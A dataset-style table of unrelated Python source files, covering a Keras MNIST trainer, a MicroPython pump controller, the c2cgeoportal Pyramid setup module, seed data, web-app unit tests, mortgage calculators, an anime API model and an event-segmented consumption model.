text string | size int64 | token_count int64 |
|---|---|---|
import numpy as np
import keras
import keras.layers as layers
from get_mnist import get_mnist_preproc
### --- hyperparameterrs --- ###
epochs = 48
batch_size = 64
num_classes = 10
reg = 3e-3
### --- hyperparams end --- ###
### --- setup data --- ###
traini, trainl, vali, vall, testi, testl = get_mnist_preproc()
trainl = keras.utils.to_categorical(trainl, num_classes=None)
vall = keras.utils.to_categorical(vall, num_classes=None)
testl = keras.utils.to_categorical(testl, num_classes=None)
### --- end setup --- ###
### --- define model --- ###
model = keras.Sequential()
# TODO: regularzation
model.add(
layers.Conv2D(
input_shape=traini.shape[1:],
activation='relu',
filters=8,
kernel_size=3,
padding='same',
kernel_regularizer=keras.regularizers.l2(reg)
)
)
model.add(
layers.Conv2D(
activation='relu',
filters=8,
kernel_size=3,
padding='same',
kernel_regularizer=keras.regularizers.l2(reg)
)
)
model.add(
layers.MaxPooling2D(
pool_size=2
)
)
model.add(
layers.Conv2D(
activation='relu',
filters=8,
kernel_size=3,
padding='same',
kernel_regularizer=keras.regularizers.l2(reg)
)
)
model.add(
layers.Conv2D(
activation='relu',
filters=8,
kernel_size=3,
padding='same',
kernel_regularizer=keras.regularizers.l2(reg)
)
)
model.add(
layers.Flatten()
)
model.add(
layers.Dense(
num_classes,
activation='softmax',
kernel_regularizer=keras.regularizers.l2(reg)
)
)
### --- end definition --- ###
### --- training --- ###
model.compile(
optimizer='adam',
loss='categorical_crossentropy',
metrics=['accuracy']
)
# Score untrained model.
scores_untrained = model.evaluate(testi, testl, verbose=1)
history = model.fit(
traini, trainl,
epochs=epochs,
batch_size=batch_size,
validation_data=(vali, vall),
shuffle=True
)
print('Test loss untrained:', scores_untrained[0])
print('Test accuracy untrained:', scores_untrained[1])
# Score trained model.
scores = model.evaluate(testi, testl, verbose=1)
print('Test loss:', scores[0])
print('Test accuracy:', scores[1])
### --- end training --- ###
### --- save model --- ###
model.summary()
json_string = model.to_json()
with open('./mnist/mnist_model.json', 'w') as file:
file.write(json_string + '\n')
model.save_weights('./mnist/mnist_weights.hdf5')
### --- end save --- ###
| 2,529 | 921 |
import config
import controller
import hwrtc
import network
import web_server
import wlan
def main():
if config.wlan_ssid and config.wlan_password:
wlan.initialize_wlan()
wlan.connect_to_wlan()
hwrtc.initialize_hwrtc()
hwrtc.initialize_ds3231()
hwrtc.synchronize_hwrtc_ds3231()
controller.register_pump_led_interrupt_handlers()
if config.wlan_ssid \
and config.wlan_password \
and wlan.wlan.status() == network.STAT_GOT_IP:
web_server.start_web_server()
main()
| 539 | 198 |
# -*- coding: utf-8 -*-
# Copyright (c) 2011-2016, Camptocamp SA
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# The views and conclusions contained in the software and documentation are those
# of the authors and should not be interpreted as representing official policies,
# either expressed or implied, of the FreeBSD Project.
import logging
import sqlalchemy
import sqlahelper
import pyramid_tm
import mimetypes
import c2c.template
from urlparse import urlsplit
import simplejson as json
from socket import gethostbyname, gaierror
from ipcalc import IP, Network
import importlib
from pyramid_mako import add_mako_renderer
from pyramid.interfaces import IStaticURLInfo
from pyramid.httpexceptions import HTTPException
from papyrus.renderers import GeoJSON, XSD
from c2cgeoportal import stats
from c2cgeoportal.resources import FAModels
from c2cgeoportal.lib import dbreflection, get_setting, caching, \
C2CPregenerator, MultiDomainStaticURLInfo
log = logging.getLogger(__name__)
# used by (sql|form)alchemy
srid = None
schema = None
parentschema = None
formalchemy_language = None
formalchemy_default_zoom = 10
formalchemy_default_x = 740000
formalchemy_default_y = 5860000
formalchemy_available_functionalities = []
formalchemy_available_metadata = []
# Header predicate to accept only JSON content
# OL/cgxp are not setting the correct content type for JSON. We have to accept
# XML as well even though JSON is actually send.
JSON_CONTENT_TYPE = "Content-Type:application/(?:json|xml)"
class DecimalJSON:
def __init__(self, jsonp_param_name="callback"):
self.jsonp_param_name = jsonp_param_name
def __call__(self, info):
def _render(value, system):
ret = json.dumps(value, use_decimal=True)
request = system.get("request")
if request is not None:
callback = request.params.get(self.jsonp_param_name)
if callback is None:
request.response.content_type = "application/json"
else:
request.response.content_type = "text/javascript"
ret = "%(callback)s(%(json)s);" % {
"callback": callback,
"json": ret
}
return ret
return _render
INTERFACE_TYPE_CGXP = "cgxp"
INTERFACE_TYPE_NGEO = "ngeo"
INTERFACE_TYPE_NGEO_CATALOGUE = "ngeo"
def add_interface(
config, interface_name=None, interface_type=INTERFACE_TYPE_CGXP, **kwargs
): # pragma: nocover
if interface_type == INTERFACE_TYPE_CGXP:
if interface_name is None:
add_interface_cgxp(
config,
interface_name="main",
route_names=("home", "viewer"),
routes=("/", "/viewer.js"),
renderers=("index.html", "viewer.js"),
)
else:
add_interface_cgxp(
config,
interface_name=interface_name,
route_names=(interface_name, interface_name + ".js"),
routes=("/%s" % interface_name, "/%s.js" % interface_name),
renderers=("/%s.html" % interface_name, "/%s.js" % interface_name),
)
elif interface_type == INTERFACE_TYPE_NGEO:
route = "/" if interface_name == "desktop" else "/%s" % interface_name
add_interface_ngeo(
config,
interface_name=interface_name,
route_name=interface_name,
route=route,
renderer="/%s.html" % interface_name,
)
def add_interface_cgxp(config, interface_name, route_names, routes, renderers): # pragma: nocover
# Cannot be at the header to don"t load the model too early
from c2cgeoportal.views.entry import Entry
def add_interface(f):
def new_f(root, request):
request.interface_name = interface_name
return f(root, request)
return new_f
config.add_route(route_names[0], routes[0])
config.add_view(
Entry,
decorator=add_interface,
attr="get_cgxp_index_vars",
route_name=route_names[0],
renderer=renderers[0]
)
# permalink theme: recover the theme for generating custom viewer.js url
config.add_route(
"%stheme" % route_names[0],
"%s%stheme/*themes" % (routes[0], "" if routes[0][-1] == "/" else "/"),
)
config.add_view(
Entry,
decorator=add_interface,
attr="get_cgxp_permalinktheme_vars",
route_name="%stheme" % route_names[0],
renderer=renderers[0]
)
config.add_route(
route_names[1], routes[1],
request_method="GET",
pregenerator=C2CPregenerator(role=True),
)
config.add_view(
Entry,
decorator=add_interface,
attr="get_cgxp_viewer_vars",
route_name=route_names[1],
renderer=renderers[1]
)
ngeo_static_init = False
def add_interface_ngeo(config, interface_name, route_name, route, renderer): # pragma: nocover
# Cannot be at the header to don't load the model too early
from c2cgeoportal.views.entry import Entry
def add_interface(f):
def new_f(root, request):
request.interface_name = interface_name
return f(root, request)
return new_f
config.add_route(route_name, route, request_method="GET")
config.add_view(
Entry,
decorator=add_interface,
attr="get_ngeo_index_vars",
route_name=route_name,
renderer=renderer
)
# permalink theme: recover the theme for generating custom viewer.js url
config.add_route(
"%stheme" % route_name,
"%s%stheme/*themes" % (route, "" if route[-1] == "/" else "/"),
request_method="GET",
)
config.add_view(
Entry,
decorator=add_interface,
attr="get_ngeo_permalinktheme_vars",
route_name="%stheme" % route_name,
renderer=renderer
)
global ngeo_static_init
if not ngeo_static_init:
add_static_view_ngeo(config)
ngeo_static_init = True
def add_static_view_ngeo(config): # pragma: nocover
""" Add the project static view for ngeo """
package = config.get_settings()["package"]
_add_static_view(config, "proj-ngeo", "%s:static-ngeo" % package)
config.override_asset(
to_override="c2cgeoportal:project/",
override_with="%s:static-ngeo/" % package
)
config.add_static_view(
name=package,
path="%s:static" % package,
cache_max_age=int(config.get_settings()["default_max_age"])
)
config.add_static_view("node_modules", config.get_settings().get("node_modules_path"))
config.add_static_view("closure", config.get_settings().get("closure_library_path"))
mimetypes.add_type("text/css", ".less")
def add_admin_interface(config):
if config.get_settings().get("enable_admin_interface", False):
config.formalchemy_admin(
route_name="admin",
package=config.get_settings()["package"],
view="fa.jquery.pyramid.ModelView",
factory=FAModels
)
def add_static_view(config):
""" Add the project static view for CGXP """
package = config.get_settings()["package"]
_add_static_view(config, "proj", "%s:static" % package)
config.override_asset(
to_override="c2cgeoportal:project/",
override_with="%s:static/" % package
)
CACHE_PATH = []
def _add_static_view(config, name, path):
from c2cgeoportal.lib.cacheversion import version_cache_buster
config.add_static_view(
name=name,
path=path,
cache_max_age=int(config.get_settings()["default_max_age"]),
)
config.add_cache_buster(path, version_cache_buster)
CACHE_PATH.append(unicode(name))
def locale_negotiator(request):
lang = request.params.get("lang")
if lang is None:
# if best_match returns None then use the default_locale_name configuration variable
return request.accept_language.best_match(
request.registry.settings.get("available_locale_names"),
default_match=request.registry.settings.get("default_locale_name"))
return lang
def _match_url_start(ref, val):
"""
Checks that the val URL starts like the ref URL.
"""
ref_parts = ref.rstrip("/").split("/")
val_parts = val.rstrip("/").split("/")[0:len(ref_parts)]
return ref_parts == val_parts
def _is_valid_referer(referer, settings):
if referer:
list = settings.get("authorized_referers", [])
return any(_match_url_start(x, referer) for x in list)
else:
return False
def _create_get_user_from_request(settings):
def get_user_from_request(request):
""" Return the User object for the request.
Return ``None`` if:
* user is anonymous
* it does not exist in the database
* the referer is invalid
"""
from c2cgeoportal.models import DBSession, User
# disable the referer check for the admin interface
if not (
request.path_info_peek() == "admin" and request.referer is None or
_is_valid_referer(request.referer, settings)
):
if request.referer is not None:
log.warning("Invalid referer for %s: %s", request.path_qs,
repr(request.referer))
return None
if not hasattr(request, "_user"):
request._user = None
username = request.authenticated_userid
if username is not None:
# We know we will need the role object of the
# user so we use joined loading
request._user = DBSession.query(User) \
.filter_by(username=username) \
.first()
return request._user
return get_user_from_request
def set_user_validator(config, user_validator):
""" Call this function to register a user validator function.
The validator function is passed three arguments: ``request``,
``username``, and ``password``. The function should return the
user name if the credentials are valid, and ``None`` otherwise.
The validator should not do the actual authentication operation
by calling ``remember``, this is handled by the ``login`` view.
"""
def register():
config.registry.validate_user = user_validator
config.action("user_validator", register)
def default_user_validator(request, username, password):
"""
Validate the username/password. This is c2cgeoportal's
default user validator.
Return none if we are anonymous, the string to remember otherwise.
"""
from c2cgeoportal.models import DBSession, User
user = DBSession.query(User).filter_by(username=username).first()
return username if user and user.validate_password(password) else None
class OgcproxyRoutePredicate:
""" Serve as a custom route predicate function for ogcproxy.
We do not want the OGC proxy to be used to reach the app's
mapserv script. We just return False if the url includes
"mapserv". It is rather drastic, but works for us. """
def __init__(self, val, config):
self.private_networks = [
Network("127.0.0.0/8"),
Network("10.0.0.0/8"),
Network("172.16.0.0/12"),
Network("192.168.0.0/16"),
]
def __call__(self, context, request):
url = request.params.get("url")
if url is None:
return False
parts = urlsplit(url)
try:
ip = IP(gethostbyname(parts.netloc))
except gaierror as e:
log.info("Unable to get host name for %s: %s" % (url, e))
return False
for net in self.private_networks:
if ip in net:
return False
return True
def phash(self): # pragma: nocover
return ""
class MapserverproxyRoutePredicate:
""" Serve as a custom route predicate function for mapserverproxy.
If the hide_capabilities setting is set and is true then we want to
return 404s on GetCapabilities requests."""
def __init__(self, val, config):
pass
def __call__(self, context, request):
hide_capabilities = request.registry.settings.get("hide_capabilities")
if not hide_capabilities:
return True
params = dict(
(k.lower(), unicode(v).lower()) for k, v in request.params.iteritems()
)
return "request" not in params or params["request"] != u"getcapabilities"
def phash(self):
return ""
def add_cors_route(config, pattern, service):
"""
Add the OPTIONS route and view need for services supporting CORS.
"""
def view(request): # pragma: nocover
from c2cgeoportal.lib.caching import set_common_headers, NO_CACHE
return set_common_headers(request, service, NO_CACHE)
name = pattern + "_options"
config.add_route(name, pattern, request_method="OPTIONS")
config.add_view(view, route_name=name)
def error_handler(http_exception, request): # pragma: nocover
"""
View callable for handling all the exceptions that are not already handled.
"""
log.warning("%s returned status code %s", request.url,
http_exception.status_code)
return caching.set_common_headers(
request, "error", caching.NO_CACHE, http_exception, vary=True
)
def call_hook(settings, name, *args, **kwargs):
hooks = settings.get("hooks", {})
hook = hooks.get(name, None)
if hook is None:
return
parts = hook.split(".")
module = importlib.import_module(".".join(parts[0:-1]))
function = getattr(module, parts[-1])
function(*args, **kwargs)
def includeme(config):
""" This function returns a Pyramid WSGI application.
"""
# update the settings object from the YAML application config file
settings = config.get_settings()
settings.update(c2c.template.get_config(settings.get("app.cfg")))
call_hook(settings, "after_settings", settings)
global srid
global schema
global parentschema
global formalchemy_language
global formalchemy_default_zoom
global formalchemy_default_x
global formalchemy_default_y
global formalchemy_available_functionalities
global formalchemy_available_metadata
config.add_request_method(_create_get_user_from_request(settings),
name="user", property=True)
# configure 'locale' dir as the translation dir for c2cgeoportal app
config.add_translation_dirs("c2cgeoportal:locale/")
# initialize database
engine = sqlalchemy.engine_from_config(
settings,
"sqlalchemy.")
sqlahelper.add_engine(engine)
config.include(pyramid_tm.includeme)
config.include("pyramid_closure")
# initialize the dbreflection module
dbreflection.init(engine)
# dogpile.cache configuration
caching.init_region(settings["cache"])
caching.invalidate_region()
# Register a tween to get back the cache buster path.
config.add_tween("c2cgeoportal.lib.cacheversion.CachebusterTween")
# bind the mako renderer to other file extensions
add_mako_renderer(config, ".html")
add_mako_renderer(config, ".js")
config.include("pyramid_chameleon")
# add the "geojson" renderer
config.add_renderer("geojson", GeoJSON())
# add decimal json renderer
config.add_renderer("decimaljson", DecimalJSON())
# add the "xsd" renderer
config.add_renderer("xsd", XSD(
sequence_callback=dbreflection._xsd_sequence_callback
))
# add the set_user_validator directive, and set a default user
# validator
config.add_directive("set_user_validator", set_user_validator)
config.set_user_validator(default_user_validator)
if settings.get("ogcproxy_enable", False): # pragma: nocover
# add an OGCProxy view
config.add_route_predicate("ogc_server", OgcproxyRoutePredicate)
config.add_route(
"ogcproxy", "/ogcproxy",
ogc_server=True
)
config.add_view("papyrus_ogcproxy.views:ogcproxy", route_name="ogcproxy")
# add routes to the mapserver proxy
config.add_route_predicate("mapserverproxy", MapserverproxyRoutePredicate)
config.add_route(
"mapserverproxy", "/mapserv_proxy",
mapserverproxy=True, pregenerator=C2CPregenerator(role=True),
)
# add route to the tinyows proxy
config.add_route(
"tinyowsproxy", "/tinyows_proxy",
pregenerator=C2CPregenerator(role=True),
)
# add routes to csv view
config.add_route("csvecho", "/csv", request_method="POST")
# add route to the export GPX/KML view
config.add_route("exportgpxkml", "/exportgpxkml")
# add routes to the echo service
config.add_route("echo", "/echo", request_method="POST")
# add routes to the entry view class
config.add_route("base", "/", static=True)
config.add_route("loginform", "/login.html", request_method="GET")
add_cors_route(config, "/login", "login")
config.add_route("login", "/login", request_method="POST")
add_cors_route(config, "/logout", "login")
config.add_route("logout", "/logout", request_method="GET")
add_cors_route(config, "/loginchange", "login")
config.add_route("loginchange", "/loginchange", request_method="POST")
add_cors_route(config, "/loginresetpassword", "login")
config.add_route("loginresetpassword", "/loginresetpassword", request_method="POST")
add_cors_route(config, "/loginuser", "login")
config.add_route("loginuser", "/loginuser", request_method="GET")
config.add_route("testi18n", "/testi18n.html", request_method="GET")
config.add_route("apijs", "/api.js", request_method="GET")
config.add_route("xapijs", "/xapi.js", request_method="GET")
config.add_route("apihelp", "/apihelp.html", request_method="GET")
config.add_route("xapihelp", "/xapihelp.html", request_method="GET")
config.add_route(
"themes", "/themes",
request_method="GET",
pregenerator=C2CPregenerator(role=True),
)
config.add_route("invalidate", "/invalidate", request_method="GET")
# checker routes, Checkers are web services to test and assess that
# the application is correctly functioning.
# These web services are used by tools like (nagios).
config.add_route("checker_routes", "/checker_routes", request_method="GET")
config.add_route("checker_lang_files", "/checker_lang_files", request_method="GET")
config.add_route("checker_pdf3", "/checker_pdf3", request_method="GET")
config.add_route("checker_fts", "/checker_fts", request_method="GET")
config.add_route("checker_theme_errors", "/checker_theme_errors", request_method="GET")
config.add_route("checker_phantomjs", "/checker_phantomjs", request_method="GET")
# collector
config.add_route("check_collector", "/check_collector", request_method="GET")
# print proxy routes
config.add_route("printproxy", "/printproxy", request_method="HEAD")
add_cors_route(config, "/printproxy/*all", "print")
config.add_route(
"printproxy_capabilities", "/printproxy/capabilities.json",
request_method="GET", pregenerator=C2CPregenerator(role=True),
)
config.add_route(
"printproxy_report_create", "/printproxy/report.{format}",
request_method="POST", header=JSON_CONTENT_TYPE
)
config.add_route(
"printproxy_status", "/printproxy/status/{ref}.json",
request_method="GET"
)
config.add_route(
"printproxy_cancel", "/printproxy/cancel/{ref}",
request_method="DELETE"
)
config.add_route(
"printproxy_report_get", "/printproxy/report/{ref}",
request_method="GET"
)
# full text search routes
add_cors_route(config, "/fulltextsearch", "fulltextsearch")
config.add_route("fulltextsearch", "/fulltextsearch")
# Access to raster data
add_cors_route(config, "/raster", "raster")
config.add_route("raster", "/raster", request_method="GET")
add_cors_route(config, "/profile.{ext}", "profile")
config.add_route("profile.csv", "/profile.csv", request_method="POST")
config.add_route("profile.json", "/profile.json", request_method="POST")
# shortener
config.add_route("shortener_create", "/short/create", request_method="POST")
config.add_route("shortener_get", "/short/{ref}", request_method="GET")
# Geometry processing
config.add_route("difference", "/difference", request_method="POST")
# PDF report tool
config.add_route("pdfreport", "/pdfreport/{layername}/{id}", request_method="GET")
# add routes for the "layers" web service
add_cors_route(config, "/layers/*all", "layers")
config.add_route(
"layers_count", "/layers/{layer_id:\\d+}/count",
request_method="GET"
)
config.add_route(
"layers_metadata", "/layers/{layer_id:\\d+}/md.xsd",
request_method="GET",
pregenerator=C2CPregenerator(role=True),
)
config.add_route(
"layers_read_many",
"/layers/{layer_id:\\d+,?(\\d+,)*\\d*$}",
request_method="GET") # supports URLs like /layers/1,2,3
config.add_route(
"layers_read_one", "/layers/{layer_id:\\d+}/{feature_id}",
request_method="GET")
config.add_route(
"layers_create", "/layers/{layer_id:\\d+}",
request_method="POST", header=JSON_CONTENT_TYPE)
config.add_route(
"layers_update", "/layers/{layer_id:\\d+}/{feature_id}",
request_method="PUT", header=JSON_CONTENT_TYPE)
config.add_route(
"layers_delete", "/layers/{layer_id:\\d+}/{feature_id}",
request_method="DELETE")
config.add_route(
"layers_enumerate_attribute_values",
"/layers/{layer_name}/values/{field_name}",
request_method="GET",
pregenerator=C2CPregenerator(),
)
# there's no view corresponding to that route, it is to be used from
# mako templates to get the root of the "layers" web service
config.add_route("layers_root", "/layers/", request_method="HEAD")
# Resource proxy (load external url, useful when loading non https content)
config.add_route("resourceproxy", "/resourceproxy", request_method="GET")
# pyramid_formalchemy's configuration
config.include("pyramid_formalchemy")
config.include("fa.jquery")
# define the srid, schema and parentschema
# as global variables to be usable in the model
srid = settings["srid"]
schema = settings["schema"]
parentschema = settings["parentschema"]
formalchemy_default_zoom = get_setting(
settings,
("admin_interface", "map_zoom"), formalchemy_default_zoom)
formalchemy_default_x = get_setting(
settings,
("admin_interface", "map_x"), formalchemy_default_x)
formalchemy_default_y = get_setting(
settings,
("admin_interface", "map_y"), formalchemy_default_y)
formalchemy_available_functionalities = get_setting(
settings,
("admin_interface", "available_functionalities"),
formalchemy_available_functionalities)
formalchemy_available_metadata = get_setting(
settings,
("admin_interface", "available_metadata"),
formalchemy_available_metadata)
config.add_route("checker_all", "/checker_all", request_method="GET")
config.add_route("version_json", "/version.json", request_method="GET")
stats.init(config)
# scan view decorator for adding routes
config.scan(ignore=["c2cgeoportal.tests", "c2cgeoportal.scripts"])
config.registry.registerUtility(
MultiDomainStaticURLInfo(), IStaticURLInfo)
# add the static view (for static resources)
_add_static_view(config, "static", "c2cgeoportal:static")
_add_static_view(config, "project", "c2cgeoportal:project")
add_admin_interface(config)
add_static_view(config)
# Handles the other HTTP errors raised by the views. Without that,
# the client receives a status=200 without content.
config.add_view(error_handler, context=HTTPException)
| 25,480 | 7,879 |
import sys
import pathlib
from datetime import datetime
current_dir = pathlib.Path(__file__).resolve().parent
sys.path.append( str(current_dir) + '/../../' )
from app.database import BASE, ENGINE, session_scope
from app.models.todos import Todo
from app.models.users import User
def generate_seed_data():
BASE.metadata.create_all(ENGINE)
users = [["太郎"], ["次郎"], ["花子"]]
todos = [
[1, "title1", "description1", datetime.now()],
[1, "title2", "description2", datetime.now()],
[2, "title3", "description3", datetime.now()],
[2, "title4", "description4", datetime.now()],
[3, "title5", "description5", datetime.now()],
[3, "title6", "description6", datetime.now()]
]
with session_scope() as session:
for user in users:
session.add(User(user[0]))
for todo in todos:
session.add(Todo(
user_id = todo[0],
title = todo[1],
description = todo[2],
deadline = todo[3]
))
if __name__ == "__main__":
generate_seed_data()
| 1,102 | 347 |
# -*- coding: UTF-8 -*-
import os
import os.path
import json
import platform
import tempfile
import logging
if platform.python_version() < '2.7':
import unittest2 as unittest
else:
import unittest
from rogue_scores.web import app
from rogue_scores.web.app import index, scores_upload, scores_json
class FakeRequest(object):
scores = '[]'
def __init__(self, *args, **kwargs):
self.form = {'scores': FakeRequest.scores}
self.headers = {}
self.args = {}
app.app.logger.handlers = [logging.FileHandler('/dev/null')]
class TestRogueWeb(unittest.TestCase):
def setUp(self):
self._scores = app.app.config['SCORES']
self._req = app.request
self.tmp = tempfile.NamedTemporaryFile(delete=False)
app.request = FakeRequest()
app.app.config['SCORES'] = self.tmp.name
self.json = json.dumps([
{'user': 'foo', 'level': 42, 'cause': 'bar',
'status': 'killed', 'score': 24},
{'user': 'moo', 'level': 25, 'cause': 'qwe',
'status': 'killed', 'score': 255}
]).encode('utf-8')
self.tmp.write(self.json)
self.tmp.close()
def tearDown(self):
app.app.config['SCORES'] = self._scores
app.request = self._req
if os.path.isfile(self.tmp.name):
os.unlink(self.tmp.name)
def getScores(self):
with open(self.tmp.name) as f:
return json.loads(f.read())
# == .index == #
def test_index_no_score(self):
os.unlink(self.tmp.name)
with app.app.app_context():
ret = index()
self.assertRegexpMatches(ret, r'</th>\s*</tr>\s*</table>')
# == .scores_upload == #
def test_scores_upload_wrong_json(self):
FakeRequest.scores = '}w$'
app.request = FakeRequest()
with app.app.app_context():
ret = scores_upload()
self.assertEquals('wrong json', ret)
def test_scores_upload_no_scores(self):
FakeRequest.scores = '[]'
app.request = FakeRequest()
with app.app.app_context():
ret = scores_upload()
self.assertEquals('ok', ret)
def test_scores_upload_new_scores(self):
FakeRequest.scores = '[["myname", 50, "killed by a foo on level 43"]]'
app.request = FakeRequest()
with app.app.app_context():
ret = scores_upload()
self.assertEquals('ok', ret)
d = {'user': 'myname', 'level': 43,
'status': 'killed', 'cause': 'foo', 'score': 50}
self.assertEquals(d, self.getScores()[0])
# == .scores_json == #
def test_scores_json(self):
with app.app.app_context():
resp = scores_json()
self.assertEquals(json.loads(self.json.decode('utf-8')),
json.loads(resp.data.decode('utf-8')))
def test_scores_pretty_json(self):
app.request = self._req
with app.app.test_request_context('/scores?pretty=1'):
resp = scores_json()
txt = resp.data.decode('utf-8')
self.assertEquals(json.loads(self.json.decode('utf-8')),
json.loads(txt))
self.assertRegexpMatches(txt, '^\[\n +\{')
| 3,217 | 1,093 |
from math import factorial
n = 86
k = 8
res = factorial(n)/factorial(n-k)%1e6
print int(res)
| 95 | 45 |
"""
Investment
created by Herman Tai 3/20/2008
"""
from math import *
TOLERANCE = 0.0000001
def equals(n1,n2):
return abs(n1-n2) <TOLERANCE
def calculate_monthly_payment(principle,year,rate_percent):
terms = year * 12.0
rate = rate_percent/100.0
monthly_rate = rate/12.0
# special case
if monthly_rate == 0:
return principle/terms
z = 1+monthly_rate
pmt = principle * z**terms * (z-1)/(z**terms-1)
return pmt
def calculate_principle(pmt, years, rate_percent):
terms = years * 12.0
monthly_rate = (rate_percent / 100.0) / 12.0
z = 1+monthly_rate
if z == 1:
return pmt * terms
p = ( (z**terms - 1)*pmt )/( (z-1)*z**terms )
return p
def calculate_years(principle, pmt, rate_percent):
monthly_rate = (rate_percent / 100.0) / 12.0
top_part = ( log(pmt) - log(pmt - principle*monthly_rate) )
bottom_part = log(1+monthly_rate)
terms = top_part/bottom_part
return terms/12.0
def number_format(num, places=0):
"""Format a number with grouped thousands and given decimal places"""
places = max(0,places)
tmp = "%.*f" % (places, num)
point = tmp.find(".")
integer = (point == -1) and tmp or tmp[:point]
decimal = (point != -1) and tmp[point:] or ""
count = 0
formatted = []
for i in range(len(integer), 0, -1):
count += 1
formatted.append(integer[i - 1])
if count % 3 == 0 and i - 1:
formatted.append(",")
integer = "".join(formatted[::-1])
return integer+decimal
class RealEstateInvestment:
def __init__(self, price, years, apr, monthly_expense=0, annual_expense_percent=0, appreciation=0, inflation=0, one_time_expense=0, down_payment=0,rent=0):
self.price = float(price)
self.years = float(years)
self.apr = float(apr)
self.monthly_expense = float(monthly_expense)
self.annual_expense_percent = float(annual_expense_percent)
self.appreciation = float(appreciation)
self.inflation = float(inflation)
self.one_time_expense = float(one_time_expense)
self.down_payment = float(down_payment)
self.rent = float(rent)
def get_noi(self, yr=1):
if yr == 1:
expense = self.down_payment + self.one_time_expense
else:
expense = 0
expense += self.get_annual_expense(yr)
expense += self.get_mortgage_payment() * 12
income = self.get_rent(yr) * 12
return income - expense
def get_monthly_expense(self, yr=1):
inflation_p = self.inflation / 100.0
return self.monthly_expense * (1+inflation_p) ** (yr-1)
def get_annual_expense(self, yr=1):
return self.get_asset_value(yr)*self.annual_expense_percent / 100 + self.get_monthly_expense(yr)
def get_asset_value(self, yr=1):
return self.price * (1 + self.appreciation/100)**(yr-1)
def get_rent(self,yr=1):
return self.rent * (1 + self.inflation/100.0)**(yr-1)
def get_mortgage_payment(self):
mortgage_payment = calculate_monthly_payment(self.price-self.down_payment,self.years,self.apr)
return mortgage_payment
| 3,162 | 1,197 |
import requests
import json
from Sakurajima.models import base_models as bm
class RecommendationEntry(object):
def __init__(self, data_dict, headers, cookies, api_url):
self.__headers = headers
self.__cookies = cookies
self.__API_URL = api_url
self.title = data_dict.get("title", None)
self.episodes_max = data_dict.get("episodes_max", None)
self.type = data_dict.get("type", None)
self.anime_id = data_dict.get("detail_id", None)
self.cover = data_dict.get("cover", None)
self.airing_start = data_dict.get("airing_start", None)
self.recommendations = data_dict.get("recommendations", None)
self.d_status = data_dict.get("d_status", None)
self.has_special = data_dict.get("hasSpecial", None)
self.progress = data_dict.get("progress", None)
self.cur_episodes = data_dict.get("cur_episodes", None)
def __post(self, data):
with requests.post(
self.__API_URL, headers=self.__headers, json=data, cookies=self.__cookies
) as url:
return json.loads(url.text)
def __repr__(self):
return f"<RecommendationEntry: {self.title}>"
def get_anime(self):
data = {
"controller": "Anime",
"action": "getAnime",
"detail_id": str(self.anime_id),
}
return bm.Anime(
self.__post(data)["anime"],
headers=self.__headers,
cookies=self.__cookies,
api_url=self.__API_URL,
)
| 1,544 | 490 |
"""Events separate segements of data. A model is fitted to each segment independently"""
import numpy as np
class InvalidPeriod(Exception): pass
class event(object):
def __init__(self, date):
self.date = date
def period_range(min_date, max_date, events, index):
if index > len(events): raise InvalidPeriod('Not enough events to generate period %s' % index)
dates = []
dates.append(min_date)
if len(events) > 0: dates.extend([e.date for e in events])
dates.append(max_date)
dates.sort()
return {'from': dates[index], 'to': dates[index+1]}
def period_data(data, events, i):
min_date, max_date = np.min(data['date']), np.max(data['date'])
p_range = period_range(min_date, max_date, events, i)
if i == 0: from_indices = (data['date'] >= min_date)
else: from_indices = (data['date'] >= events[i - 1].date)
if i == len(events): to_indices = (data['date'] <= max_date)
else: to_indices = (data['date'] < events[i].date)
return data[from_indices & to_indices]
def periods(data, events, model):
"""Generate a list of model instances for each subset of data"""
result = []
for i in range(len(events)+1):
p_data = period_data(data, events, i)
result.append(model(p_data))
return result
class event_model(object):
"""Fits the given data to the given model but allows for events to be added which segment the modelling"""
def __init__(self, data):
self.model = model
self.data = data
self.events = []
self._recalculate()
def _recalculate(self):
"""regenerate all internal models based on event dates and saved input data"""
# self.periods = periods(self.data, self.events, self.model)
self.periods = []
for i in range(len(self.events)+1):
p_data = period_data(self.data, self.events, i)
self.periods.append(self.model(p_data))
def add_event(self, ev):
self.events.append(ev)
self.events.sort(key=lambda x: x.date)
self._recalculate()
def prediction(self, independent_data):
for i in range(len(self.periods)):
p_data = period_data(independent_data, self.events, i)
p_pred = self.periods[i].prediction(p_data)
if i == 0:
result = p_pred
else:
result = np.concatenate((result, p_pred))
return result
def simulation(self, independent_data):
for i in range(len(self.periods)):
p_data = period_data(independent_data, self.events, i)
p_sim = self.periods[i].simulation(p_data)
if i == 0:
result = p_sim
else:
result = np.concatenate((result, p_sim))
return result
def residuals(self, independent_data):
pred = self.prediction(independent_data)
return independent_data['consumption'] - pred
def parameters(self):
result = []
for p in self.periods: result.append(p.parameters())
return result
if __name__ == "__main__":
import matplotlib.pyplot as plt
from ConsumptionModels import Constant, TwoParameterModel
from DataAccess import RandomDataFactory
f = RandomDataFactory()
data = f.randomData(1000)
em = event_model(data, Constant)
for d in range(8):
em.add_event(event(200000.0 * (d + 1)))
pred = em.prediction(data)
res = em.residuals(data)
# print em.parameters()
plt.plot(data['date'], data['consumption'])
plt.plot(data['date'], res)
